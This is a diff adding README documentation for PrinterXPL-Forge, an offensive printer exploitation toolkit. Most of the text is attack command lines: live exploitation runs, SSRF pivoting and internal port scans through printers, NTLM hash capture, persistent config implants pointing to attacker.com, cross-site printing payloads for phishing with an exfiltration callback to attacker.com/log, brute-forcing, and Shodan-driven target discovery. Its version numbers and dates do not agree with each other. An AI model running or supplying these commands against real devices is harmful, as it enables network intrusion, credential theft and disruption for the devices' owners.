+| `research-tftp-loop-dos` | CVE-2024-2169 | 7.5 | Brother/Generic | TFTP infinite loop DoS |
+
+### poly_runner Engine — v6.1.0 Enhancements
+
+The built-in multi-language exploit orchestrator now includes:
+- **`available_langs()`** — Returns a dict of all supported compilers/runtimes detected on the system
+- **`run_from_dir(module_dir, ...)`** — Auto-detects source files (`source.c`, `exploit.rb`, `exploit.go`) in a module directory and dispatches to the correct runner
+- **Compilation cache** — Skips rebuild when binary is newer than source (`os.path.getmtime` check)
+- **WSL fallback** — On Windows, if native gcc/clang is absent, automatically uses `wsl gcc` (WSL2 required)
+
+---
+
+## 6. Full Attack Matrix
+
+Runs every attack category from BlackHat 2017 + 2024-2025 CVEs:
+
+```bash
+# Dry-run (probe only)
+python printerxpl-forge.py 192.168.1.100 --attack-matrix
+
+# Live exploitation — AUTHORIZED LABS ONLY
+python printerxpl-forge.py 192.168.1.100 --attack-matrix --no-dry
+
+# Combined with network map
+python printerxpl-forge.py 192.168.1.100 --attack-matrix --network-map --no-dry
+```
+
+**Categories:** DoS · Protection Bypass · Job Manipulation · Information Disclosure · CORS/XSP · SNMP write · Network pivoting
+
+---
+
+## 7. Lateral Movement & Network Mapping
+
+```bash
+# SSRF audit via IPP/WSD
+python printerxpl-forge.py 192.168.1.100 --pivot
+
+# Port-scan internal host via printer SSRF
+python printerxpl-forge.py 192.168.1.100 --pivot-scan 10.0.0.1
+
+# Full network map from printer's perspective
+python printerxpl-forge.py 192.168.1.100 --network-map
+
+# LDAP NTLM hash capture
+python printerxpl-forge.py 192.168.1.100 --xpl-run research-ldap-hash-capture --no-dry
+```
+
+---
+
+## 8. Storage, Firmware & Payloads
+
+```bash
+# Storage audit: FTP, web file manager, SNMP MIB, saved jobs
+python printerxpl-forge.py 192.168.1.100 --storage
+
+# Firmware: version, upload endpoint check, NVRAM probe
+python printerxpl-forge.py 192.168.1.100 --firmware
+
+# Factory reset (dry-run probes endpoints)
+python printerxpl-forge.py 192.168.1.100 --firmware-reset pjl
+python printerxpl-forge.py 192.168.1.100 --firmware-reset web
+
+# Persistent config implant
+python printerxpl-forge.py 192.168.1.100 --implant smtp_host=attacker.com
+python printerxpl-forge.py 192.168.1.100 --implant snmp_community=hacked
+
+# Language-specific payload injection
+python printerxpl-forge.py 192.168.1.100 --payload pjl:reset
+python printerxpl-forge.py 192.168.1.100 --payload ps:loop
+python printerxpl-forge.py 192.168.1.100 --payload ps:custom --payload-data "statusdict begin showROMfonts end"
+```
+
+---
+
+## 9. Cross-Site Printing (XSP)
+
+```bash
+# Generate attack payloads (deployed via phishing / watering hole)
+python printerxpl-forge.py 192.168.1.100 --xsp info
+python printerxpl-forge.py 192.168.1.100 --xsp capture --xsp-callback https://attacker.com/log
+python printerxpl-forge.py 192.168.1.100 --xsp dos
+python printerxpl-forge.py 192.168.1.100 --xsp nvram
+python printerxpl-forge.py 192.168.1.100 --xsp exfil
+```
+
+---
+
+## 10. IPP & Send Job
+
+```bash
+# Full IPP security audit
+python printerxpl-forge.py 192.168.1.100 --ipp
+
+# Submit anonymous print job (dry-run)
+python printerxpl-forge.py 192.168.1.100 --ipp-submit
+python printerxpl-forge.py 192.168.1.100 --ipp-submit --no-dry
+
+# Send any file to printer
+python printerxpl-forge.py 192.168.1.100 --send-job document.pdf
+python printerxpl-forge.py 192.168.1.100 --send-job payload.ps --send-proto raw
+python printerxpl-forge.py 192.168.1.100 --send-job flyer.pdf --send-copies 10 --send-proto lpd
+```
+
+---
+
+## Full Flag Reference
+
+```
+POSITIONAL
+  target               Printer IP or hostname
+  mode                 pjl | ps | pcl | auto
+
+GENERAL
+  -h, --help           Show help
+  --version            Show version
+  -q, --quiet          Suppress banner
+  -d, --debug          Show raw bytes
+  -s, --safe           Verify language support before connecting
+  -i FILE              Batch commands from file
+  -o FILE              Log raw sent data to file
+  --config PATH        Custom config.json
+  -I, --interactive    Guided menu
+
+DISCOVERY
+  --discover-local     SNMP sweep + host installed printers
+  --discover-online    Shodan / Censys search
+  --osint              Passive OSINT for target IP
+  --auto-detect        Detect supported printer languages
+
+RECON (no payloads)
+  --scan               Banner grab + CVE lookup + attack surface
+  --scan-ml            --scan + ML fingerprinting + attack scoring
+  --no-nvd             Skip NVD API (offline mode)
+  --xpl                Auto-match exploits after --scan
+
+IPP
+  --ipp                Full IPP security audit
+  --ipp-submit         Submit anonymous IPP job (dry-run)
+  --no-dry             Disable dry-run
+
+PAYLOAD
+  --payload LANG:TYPE  Inject language-specific payload
+  --payload-data STR   Custom PS/PJL string
+
+SEND JOB
+  --send-job FILE      Send file to printer
+  --send-proto PROTO   raw (9100) | ipp (631) | lpd (515)
+  --send-copies N      Number of copies (default: 1)
+  --send-queue NAME    LPD queue name (default: lp)
+
+LATERAL MOVEMENT
+  --pivot              SSRF audit via IPP/WSD
+  --pivot-scan HOST    Port-scan HOST via printer SSRF
+  --network-map        Full network map from printer's perspective
+  --implant KEY=VALUE  Persistent config implant
+
+STORAGE & FIRMWARE
+  --storage            FTP, web, SNMP MIB, saved jobs audit
+  --firmware           Firmware version, upload endpoint, NVRAM
+  --firmware-reset M   Factory reset via pjl | web | ipp (DANGEROUS)
+
+ATTACK CAMPAIGN
+  --attack-matrix      Full BlackHat 2017 campaign (dry-run default)
+  --no-dry             Live exploitation
+
+XSP
+  --xsp TYPE           info | capture | dos | nvram | exfil
+  --xsp-callback URL   Callback URL for exfil
+
+EXPLOIT LIBRARY
+  --xpl-list           List all exploits
+  --xpl-source SRC     metasploit | exploit-db | research | custom
+  --xpl-check ID       Non-destructive probe
+  --xpl-run ID         Run exploit (add --no-dry for live)
+  --xpl-update         Rebuild xpl/index.json
+  --xpl-fetch EDB_ID   Download from ExploitDB
+
+BRUTE-FORCE
+  --bruteforce         BF: HTTP, FTP, SNMP, Telnet
+  --bf-vendor VENDOR   Vendor override
+  --bf-serial SERIAL   Device serial (__SERIAL__ token)
+  --bf-mac MAC         MAC address (__MAC6__, __MAC12__ tokens)
+  --bf-wordlist FILE   Custom wordlist (replaces default)
+  --bf-cred USER:PASS  Extra credential (repeatable)
+  --bf-no-variations   Disable leet/reverse/camelcase
+  --bf-delay SECS      Delay between attempts (default: 0.3s)
+
+CONFIG
+  --check-config       Show API key status
+```
+
+---
+
+## Supported Vendors (20+)
+
+Epson · HP · Brother · Ricoh · Xerox · Canon · Kyocera · Samsung · OKI · Lexmark · Konica Minolta · Fujifilm · Sharp · Toshiba · Zebra · Axis · Pantum · Sindoh · Develop · Utax
+
+---
+
+## Configuration
+
+```json
+{
+  "shodan":  { "api_key": "YOUR_KEY" },
+  "censys":  { "api_id": "YOUR_ID", "api_secret": "YOUR_SECRET" },
+  "nvd":     { "api_key": "YOUR_KEY" },
+  "ml":      { "enabled": true },
+  "network": { "timeout": 6, "snmp_timeout": 3 }
+}
+```
+
+```bash
+cp config.json.example config.json
+python printerxpl-forge.py --check-config
+```
+
+---
+
+## Diagram Sources
+
+All flow diagrams are editable in [diagrams.net / draw.io](https://app.diagrams.net):
+
+| File | Description |
+|------|-------------|
+| `diagrams/PrinterXPL-Forge_workflow.drawio` | 6-phase operational workflow |
+| `diagrams/credential_flow.drawio` | Credential architecture flow |
+| `diagrams/attack_matrix.drawio` | Attack coverage matrix |
+| `diagrams/*.mmd` | Mermaid source diagrams |
+
+---
+
+## OS Packaging (3 caminhos + pipx)
+
+Todo o empacotamento operacional foi centralizado em `packages/`:
+
+| Path | Objetivo | Arquivo principal |
+|------|----------|-------------------|
+| `packages/01-pypi/` | Wheel/sdist + publicação PyPI | `build.sh` / `build.ps1` |
+| `packages/02-deb/` | Pacote `.deb` (Debian/Ubuntu/Kali) | `prepare.sh` + `build.sh` |
+| `packages/03-rpm/` | Pacote `.rpm` (RHEL/Fedora/Rocky) | `build.sh` + `printerxpl-forge.spec` |
+| `packages/04-pipx/` | Instalação isolada via `pipx` | `validate.sh` / `validate.ps1` |
+
+Fluxo recomendado:
+
+```bash
+./packages/01-pypi/build.sh
+./packages/02-deb/prepare.sh && ./packages/02-deb/build.sh
+./packages/03-rpm/build.sh
+./packages/04-pipx/validate.sh
+```
+
+Guia central: `packages/README.md`
+
+---
+
+## Version History
+
+| Version | Date | Highlights |
+|---------|------|------------|
+| **3.13.0** | 2026-03-24 | ZoomEye API fix (→ api.zoomeye.ai, API-KEY auth), Netlas field fixes (geo.country, http.title), repo cleanup (remove tests/tools/debian/packaging) |
+| 3.12.0 | 2026-03-24 | CSV multi-value dork filters (--dork-vendor hp,canon --dork-port 9100,631), --dork-city multi-city, city/country guard |
+| 3.11.0 | 2026-03-24 | Engine selection UX: individual flags = single engine, --dork-engine = multi-engine only; FOFA email deprecated (key-only); ZoomEye + Netlas keys |
+| 3.10.0 | 2026-03-25 | Custom port overrides for every protocol (`--port-raw`, `--port-ipp`, `--port-snmp`, ...), `PortConfig` central resolver, `--extra-ports` scan flag |
+| 3.9.0 | 2026-03-25 | 5-engine dork discovery (Shodan, Censys, FOFA, ZoomEye, Netlas), `--dork-engine` selector, per-engine query syntax, zero-filter enforcement |
+| 3.8.0 | 2026-03-25 | Structured dork discovery (Shodan/Censys), `--auto-exploit` pipeline, `DiscoveryParams`, `DorkQueryBuilder`, `auto_exploit()` |
+| 3.7.0 | 2026-03-25 | Zero hardcoded creds, wordlist engine, draw.io diagrams, PNG assets |
+| 3.6.2 | 2026-03-25 | LDAP hash capture, CVE-2024-51978, 5 new vendors |
+| 3.6.0 | 2026-03-24 | 7 new BlackHat 2017 exploits + EDB research modules |
+| 3.5.0 | 2026-03-24 | `--send-job`, wordlists subfolder, emoji-free CLI |
+| 3.4.2 | 2026-03-24 | Interactive guided menu, spinner, next-steps hints |
+| 3.4.1 | 2026-03-24 | Login brute-force engine, variation generator |
+| 3.4.0 | 2026-03-24 | Exploit library (xpl/), --xpl-* flags, auto-matching |
+| 3.3.0 | 2026-03-24 | --attack-matrix, --network-map, XSP/CORS spoofing |
+| 3.2.0 | 2026-03-24 | IPP attacks, SSRF pivot, storage, firmware, implants |
+| 3.1.0 | 2026-03-24 | --scan/--scan-ml, CVE scanner, ML engine, Shodan |
+| 3.0.0 | 2026-03-24 | IPv6, SMB, pysnmp v5/v7, IPP/TLS, local discovery |
+| 2.5.x | 2025-10-05 | Cross-platform, PRET fork, 109 commands |
+
+---
+
+## References
+
+- Müller et al. — *Exploiting Network Printers*, BlackHat USA 2017
+- [Hacking Printers Wiki](http://hacking-printers.net)
+- [ExploitDB — Printer exploits](https://www.exploit-db.com/search?q=printer&verified=true)
+- [NVD — National Vulnerability Database](https://nvd.nist.gov)
+- [PRET — Printer Exploitation Toolkit](https://github.com/RUB-NDS/PRET)
+
+---
+
+## Legal Disclaimer
+
+<!-- LEGAL-NOTICE-UG-MRH -->
+
+PrinterXPL-Forge is developed for **authorized security research, penetration testing, and educational purposes only**. Using this tool against systems you do not own or have explicit written authorization to test is **illegal**.
+
+The software is provided **“as is” (AS IS)** under the [MIT License](LICENSE), **without warranty** of any kind (express or implied). The author is **not liable** for damages, misuse, third-party claims, or commercial/fitness guarantees — **use at your own risk**. Preserve **copyright notices** when redistributing; **pull requests** and **issues** are welcome.
+
+---
+
+<div align="center">
+
+**PrinterXPL-Forge** · *Advanced Printer Penetration Testing Toolkit*
+
+Made with care for the security community.
+
+[Documentation](https://github.com/mrhenrike/PrinterXPL-Forge/wiki) | [Issues](https://github.com/mrhenrike/PrinterXPL-Forge/issues) | [Releases](https://github.com/mrhenrike/PrinterXPL-Forge/releases)
+
+</div>